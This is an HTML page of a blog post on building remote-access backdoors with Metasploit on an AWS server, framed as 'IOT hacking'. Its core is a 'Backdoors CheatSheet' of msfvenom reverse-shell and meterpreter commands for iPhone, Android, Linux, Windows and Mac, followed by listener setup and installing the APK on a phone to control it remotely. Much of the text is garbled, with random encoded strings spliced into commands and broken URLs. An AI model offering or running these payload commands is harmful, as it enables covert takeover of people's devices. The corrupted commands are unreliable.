<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.8.0"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><meta name="author" content="Tomer Levy"><link rel="icon" href="/tomer.jpeg"><title>Information Security &amp; DevOps</title><meta name="description" content="Information Security &amp; Devops Blog"><link rel="alternate" type="application/rss+xml" title="Information Security &amp; DevOps" href="/atom.xml"><link rel="stylesheet" href="//stackpath.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css"><link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"><link rel="stylesheet" href="/css/main.css"><link rel="stylesheet" href="/css/highlight.css"><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic"><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head><body><nav class="navbar navbar-default navbar-fixed-top navbar-custom"><div class="container-fluid"><div class="navbar-header"><button type="button" data-toggle="collapse" data-target="#main-navbar" class="navbar-toggle"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a href="/" class="navbar-brand">Information Security &amp; DevOps</a></div><div id="main-navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav navbar-right"><li><a href="/archives">Archive</a></li><li><a href="/about/">About</a></li></ul></div><div class="avatar-container"><div class="avatar-img-border"><a href="/"><img src="/tomer.jpeg" class="avatar-img"></a></div></div></div></nav><header class="header-section"><div class="intro-header no-img"><div class="container"><div class="row"><div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"><div class="post-heading"><h1>How I Hacked Everyone - IOT Hacking</h1><p class="post-meta">Posted on Aug 28 2018 · <a href="/tags/Hacking/" class="tag post-meta">Hacking</a> · <a href="/tags/Pentesting/" class="tag post-meta">Pentesting</a></p></div></div></div></div></div></header><div class="container"><div class="row"><div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"><article role="main" class="blog-post"><p><strong>How I Hack Everyone and Everything – IOT Hacking.</strong></p>
<p><strong>Step 1. Launch a Server</strong></p>
<p>For this example I will be using Amazon EC2 free aaws tier</p>
<p>Go to Amazon Web Services <a href="http://aws.amazon.com" target="_blank" rel="noopener">link</a></p>
<p>Sign up or Log in, Tap on EC2</p>
<p><img src="/images/EC2MSF1.png" alt=""></p>
<p>Click on Launch Instance</p>
<p><img src="/images/EC2MSF2.png" alt=""></p>
<p>Choose Ubuntu 16.04 for Operating System</p>
<p>and Choose t2.micro</p>
<p><img src="/images/EC2MSF3.png" alt=""></p>
<p>Set-Up your preferred way to SSH (Using Keys)</p>
<p>And Log into your newly created instance.</p>
<p><strong>Step 2. Install Metasploit</strong></p>
<p>On your ubuntu CLI run this commands</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo add-apt-repository -y ppa:webupd8team/java</span><br><span class="line"></span><br><span class="line">sudo apt-get update</span><br><span class="line"></span><br><span class="line">suddo apt-get install build-essential libreadline-dev libssl-destall build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev</span><br></pre></td></tr></table></figure>
<p>Install Ruby</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">curl -sSL https://rvm.io/mpapis.asc | gpg2 --import -</span><br><span class="line"></span><br><span class="line">curl -L https://get1fWy8sFork/mettasploit-framework/rk/metta88sFork/mettasploitt-framework/rk/mettasploit-framework/r1WF1fWyy8siCQ9C8OdBsm/OGl1fWy8sFork/mettasploit-framework/master/.ruby-verssion -q -O - )</span><br><span class="line"></span><br><span class="line">rv</span><br><span class="line"></span><br><span class="line">rvm use $RUBYVERSION --default</span><br></pre></td></tr></table></figure>
<p>Create Internal Database</p>
<p><code></code><br>gsudo chown ase<br>/AmMKR44NQgAA5OQnc4HHK5HPF2zBDDz3Uw2BsLjhZ69Hoiid3fbstNriMoDz3Uwally Installing metasplo foNCpZJEUS8jIyK9+9SuKoqLR6NWrVzMyMgoLC2/fvq1QKJaWljIyMlEpY9I1JTo/Il72UUetasploit-framework.gsudo chown -R <code>whoami</code> /opt/metasploit-framework</p>
<p>cd metaspl-framework<br>cDxayDaWL53le/shell_reverj0eejbpcrlOnTuXul8/n4/H4+vp64/H4+vp6Z2KMphyLouh0OmmaFkVxamrypUUuVMphyLovvp6ZKMphyLouh0<strong>Step 3.Generate BackDoors with MsfVenom</strong></p>
<p>In this example I`m targeting Android Device but this can be done against any device</p>
<p>Backdoors CheatSheet:</p>
<p><strong>Iphone</strong></p>
<p>msfvenom -p osx/armle/shell_reverse_tcp LHOST=AttackingServerIP LPORT=ListeningABAAAAR0lNUho &gt; iOS-Backdoor</p>
<p><strong>Android</strong></p>
<p>msfvenom -p android/meterpreter/reverse_tcp LHOST=AttackingServerIP LPORT=ListeningPort &gt; Backdoor.apk</p>
<p><strong>Linux</strong></p>
<p>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=AttackingServerIP LPORT=ListeningPort -f elf &gt; backdoor.elf</p>
<p><strong>Windows</strong></p>
<p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=AttackingServerIP LPORT=ListeningPort -f exe backdoor.exe</p>
<p><strong>Mac</strong></p>
<p>msfvenom -p osx/x86/shell_reverse_tcp LHOST=AttackingServerIP LPORT=ListeningPort -f macho backdoor.macho</p>
<p><img src="/images/EC2MSF4.png" alt=""></p>
<p><strong>Step 4. Start a Listener on the server</strong></p>
<p>./msfcoGcawz5rZmmssXXoLNBQavuWajRvuWajRWVZIUzVAUzzAL8juK9ctory<br>xitOnSession false</p>
<p>run -j<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ![](pUU</span><br><span class="line"></span><br><span class="line">rr</span><br><span class="line">run -j</span><br></pre></td></tr></table></figure></p>
<p> xxxitOnSession false</p>
<p>run  ExitOnSession fa false</p>
<p>run -j<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ![](pUU</span><br><span class="line"></span><br><span class="line">run -j</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/EC2MSF5.png" alt=""></p>
<p><strong>Step 5. Install on target</strong></p>
<p>I will download  the generated APK to my device</p>
<p><img src="/images/EC2MSF6.png" alt=""></p>
<p>Opening it will result the Amazon server to take controlntrol over my Phone</p>
<p>And allow me  almost anything from remotely</p>
<p><img src="/images/EC2MSF7.png" alt=""></p>
<p> I Will be covering on how to avoid detection by Anti Viruses of any type and persist my payloads in my next posts.</p>
<p>This post is for educational purposes only.</p>
<p>Use at your own risk.</p>
</article><ul class="pager blog-pager"><li class="previous"><a href="/2018/08/30/Linux and Mac Built-in Firewalls/" data-toggle="tooltip" data-placement="top" title="Linux and Mac Built-in Firewalls">← Previous Post</a></li><li class="next"><a href="/2018/08/26/Docker-Jenkins/" data-toggle="tooltip" data-placement="top" title="Docker-Jenkins">Next Post →</a></li></ul></div></div></div><footer><div class="container beautiful-jekyll-footer"><div class="row"><div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"><ul class="list-inline text-center footer-links"><li><a href="/atom.xml" title="RSS"><span class="fa-stack fa-lg"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-stack-1x fa-inverse fa-rss"></i></span></a></li><li><a href="mailto:tl1996@gmail.com" title="Email me"><span class="fa-stack fa-lg"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-stack-1x fa-inverse fa-envelope"></i></span></a></li><li><a href="https://www.linkedin.com/in/tomer-levy/" title="LinkedIn"><span class="fa-stack fa-lg"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-stack-1x fa-inverse fa-linkedin"></i></span></a></li></ul><p class="copyright text-muted">© Tomer Levy • 2019 • <a href="mailto:undefined"></a>
</p><p class="theme-by text-muted">Theme by
<a href="https://github.com/twoyao/beautiful-hexo">beautiful-hexo</a></p></div></div></div></footer><script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script><script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script><script src="/js/main.js"></script><script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();</script><script>(function (i, s, o, g, r, a, m) {
    i['GoogleAnalyticsObject'] = r;
    i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
    a = s.createElement(o),
            m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-124261609-1', 'auto');
ga('send', 'pageview');</script><script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false}});</script></body></html>